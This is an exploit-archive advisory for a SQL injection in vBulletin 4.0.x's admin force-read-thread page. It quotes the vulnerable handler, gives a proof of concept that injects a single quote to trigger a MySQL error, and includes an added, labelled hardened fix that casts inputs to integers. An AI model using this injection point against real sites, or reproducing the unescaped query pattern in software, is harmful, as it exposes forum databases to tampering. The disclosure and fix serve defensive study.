vBulletin 4.0.x SQL Injection Vulnerability

2013-07-26T00:00:00
ID 1337DAY-ID-21029
Type zdt
Reporter n/a
Modified 2013-07-26T00:00:00

Description

vBulletin version 4.0.x appears to suffer from a remote SQL injection vulnerability in the administrative functionality.

                                        
                                            # Exploit Title: vBulletin force Read Thread 0day            #
# Author(s): n3tw0rk                                         #
# Contact: Mail:[email protected]                      #
# Product: 4.0.x                                             #
# Software Version x.x.x                                     #
# Product Download:
http://www.vbulletin.org/forum/showthread.php?t=241754&page=18
    #
# Google Dork: use your mind                                 #
# Homepage: d4tabase.com                                     #
_____________________________________________________________#

The vulnerability is caused by a variable named 'update_order' not being
sanitized before it is used within an insert into statement.

// Vulnerable handler from force_read_thread.php as quoted in the advisory:
// $threadid (array key) and $order (array value) come straight from the
// request and are interpolated into the query as quoted strings, unescaped.
if ($_REQUEST['do'] == 'update_order')
{
    $vbulletin->input->clean_array_gpc('r', array(
        'force_read_order' => TYPE_ARRAY   // only asserts "is an array"; the values are not cleaned
    ));

    if ($vbulletin->GPC['force_read_order'])
    {
        foreach ($vbulletin->GPC['force_read_order'] AS $threadid => $order)
        {
            $db->query_write("
                UPDATE " . TABLE_PREFIX . "thread AS thread
                SET force_read_order = '$order'
                WHERE threadid = '$threadid'
            ");
        }
    }
}
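A hardened form of the same handler, added here as an example (it is not vBulletin's own code or shipped fix): force_read_order is an integer ordering value, so both the thread id and the order are coerced to integers before they reach the query and nothing from the request is interpolated as a string. TYPE_ARRAY_UINT is assumed to be vBulletin's unsigned-integer array cleaner; the function name update_force_read_order is made up for this example.

```php
<?php
// Added example, not vBulletin's code. Hardened replacement for the
// update_order branch of admincp/force_read_thread.php.
// Assumes the vBulletin globals used by the original ($vbulletin, $db,
// TABLE_PREFIX) and the TYPE_ARRAY_UINT input cleaner.
function update_force_read_order($vbulletin, $db)
{
    // Values are cast to unsigned ints by the cleaner (assumed helper).
    $vbulletin->input->clean_array_gpc('r', array(
        'force_read_order' => TYPE_ARRAY_UINT
    ));

    if (empty($vbulletin->GPC['force_read_order']))
    {
        return 0;
    }

    $updated = 0;
    foreach ($vbulletin->GPC['force_read_order'] AS $threadid => $order)
    {
        // clean_array_gpc cleans values, not keys, so cast the key ourselves.
        // A payload such as 1' from the advisory becomes the integer 1 here.
        $threadid = intval($threadid);
        $order    = intval($order);
        if ($threadid <= 0)
        {
            continue;   // not a valid thread id; never reaches the query
        }

        // Only integers are concatenated, so no quoting context exists to break.
        $db->query_write("
            UPDATE " . TABLE_PREFIX . "thread AS thread
            SET force_read_order = " . $order . "
            WHERE threadid = " . $threadid . "
        ");
        $updated++;
    }
    return $updated;
}
```

Casting to int is the right fix because the column is numeric; if a string column were involved, the value would instead need $db->escape_string() or a prepared statement.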
POC

You will need Admincp access, then go to
site.com/admincp/force_read_thread.php; in the force read order column
put a ' into one of the fields to produce this:
 Database error in vBulletin 4.2.1:

Invalid SQL:

UPDATE thread AS thread
SET force_read_order = '1''
WHERE threadid = '5161';

MySQL Error   : You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'5161'' at line 2
Error Number  : 1064
Request Date  : Thursday, July 25th 2013 @ 01:20:52 AM
Error Date    : Thursday, July 25th 2013 @ 01:20:52 AM
Script        : http://d4tabase.com/admincp/force_read_thread.php?do=update_order
Referrer      : http://d4tabase.com/admincp/force_read_thread.php
IP Address    :
Username      : n3tw0rk
Classname     :
MySQL Version :

#  0day.today [2018-04-12]  #